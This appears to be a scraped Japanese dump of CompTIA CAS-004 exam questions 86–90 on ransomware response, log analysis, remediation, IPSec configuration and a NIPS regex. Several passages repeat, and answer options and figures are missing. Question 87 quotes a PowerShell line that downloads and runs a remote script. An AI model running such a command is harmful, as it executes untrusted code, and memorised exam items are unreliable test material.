CAS-004 試験問題 86
アナリストはセキュリティ イベントを調査中に、ユーザーが不明な送信元からの電子メールの添付ファイルを開いたという証拠を発見しました。ユーザーが添付ファイルを開いた直後、サーバーのグループで大量のネットワークとリソースのアクティビティが発生しました。アナリストはサーバーを調査した結果、サーバーがランサムウェアによって暗号化されており、48 時間以内に支払いを行わないとすべてのデータが破壊されることを要求していることを発見しました。同社にはランサムウェアへの対応計画はない。
インシデントを経営チームに報告した後、アナリストが取るべき次のステップは次のうちどれですか?
インシデントを経営チームに報告した後、アナリストが取るべき次のステップは次のうちどれですか?
CAS-004 試験問題 87
セキュリティ アナリストは、外部向けメール サーバーへのログイン試行の失敗数が着実に増加していることに気づきました。ジャンプ ボックスの 1 つを調査しているときに、アナリストはログ ファイルで次のことを特定しました: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl' );whois 次のセキュリティ制御のうち、警告を発して攻撃の次の段階を阻止するものはどれですか?
CAS-004 試験問題 88
最高情報セキュリティ責任者 (CISO) は、内部ホストの脆弱性スキャンから得られた以下の情報に基づいて是正措置計画を策定しています。
この発見に対して文書化するのに最も適切な是正措置は次のうちどれですか?
この発見に対して文書化するのに最も適切な是正措置は次のうちどれですか?
CAS-004 試験問題 89
IPSec ソリューションが導入されています。VPN コンセントレータと AAA サーバの両方の設定ファイルが図に示されています。
次の要件を満たすように構成ファイルを完成させます。
※EAP方式では相互証明書ベース認証(発行されたクライアント証明書あり)を使用する必要があります。
* IKEv2 暗号スイートは最も安全なように構成する必要があります
認証された動作モード、
* シークレットには、少なくとも 1 つの大文字、1 つの小文字、1 つの数字、および 1 つの特殊文字が含まれている必要があり、8 文字の最小長要件を満たしている必要があります。 手順 AAA サーバと VPN コンセントレータをクリックして設定を完了します。
適切なフィールドに入力し、ドロップダウン メニューから選択します。
VPN コンセントレーター:
AAAサーバー:
次の要件を満たすように構成ファイルを完成させます。
※EAP方式では相互証明書ベース認証(発行されたクライアント証明書あり)を使用する必要があります。
* IKEv2 暗号スイートは最も安全なように構成する必要があります
認証された動作モード、
* シークレットには、少なくとも 1 つの大文字、1 つの小文字、1 つの数字、および 1 つの特殊文字が含まれている必要があり、8 文字の最小長要件を満たしている必要があります。 手順 AAA サーバと VPN コンセントレータをクリックして設定を完了します。
適切なフィールドに入力し、ドロップダウン メニューから選択します。
VPN コンセントレーター:
AAAサーバー:
CAS-004 試験問題 90
セキュリティ アナリストは、データがオンライン プロセスに注入される新しい IOC をレビューしています。IOC は、データ インジェクションが次の方法で発生する可能性があることを示しています。
* 5 桁の数字、その後にダッシュ、その後に 4 桁の数字が続きます。または
※5桁の数字
これらの IOC のいずれかが特定されると、オンライン プロセスは動作を停止します。次の正規表現のうち、NIPS に実装する必要があるのはどれですか?
* 5 桁の数字、その後にダッシュ、その後に 4 桁の数字が続きます。または
※5桁の数字
これらの IOC のいずれかが特定されると、オンライン プロセスは動作を停止します。次の正規表現のうち、NIPS に実装する必要があるのはどれですか?